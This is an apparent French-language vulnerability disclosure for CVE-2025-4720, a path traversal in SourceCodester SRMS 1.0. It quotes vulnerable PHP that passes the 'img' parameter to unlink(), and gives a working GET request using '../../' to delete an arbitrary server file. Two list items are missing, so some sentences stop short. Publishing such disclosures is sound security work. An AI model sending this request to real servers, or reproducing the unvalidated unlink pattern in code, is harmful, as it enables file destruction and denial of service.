
Exploit de preuve de concept pour CVE-2025-4720, une vulnérabilité de traversée de chemin dans SourceCodester SRMS 1.0 permettant la suppression arbitraire de fichiers via le point de terminaison drop_student.php.
Une vulnérabilité de traversée de chemin existe dans le point de terminaison drop_student.php de SourceCodester Student Result Management System (SRMS) 1.0.
L'application prend une entrée contrôlée par l'utilisateur depuis le paramètre GET img et la transmet directement à la fonction unlink() sans validation, permettant la suppression de fichiers arbitraires sur le serveur.
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt

GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
Un attaquant peut supprimer des fichiers arbitraires accessibles au serveur web, notamment :
Cela peut entraîner un déni de service ou une exploitation ultérieure.
Cette vulnérabilité représente un vecteur d'attaque distinct par rapport aux problèmes précédemment signalés dans SRMS, car elle :
SourceCodester
Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi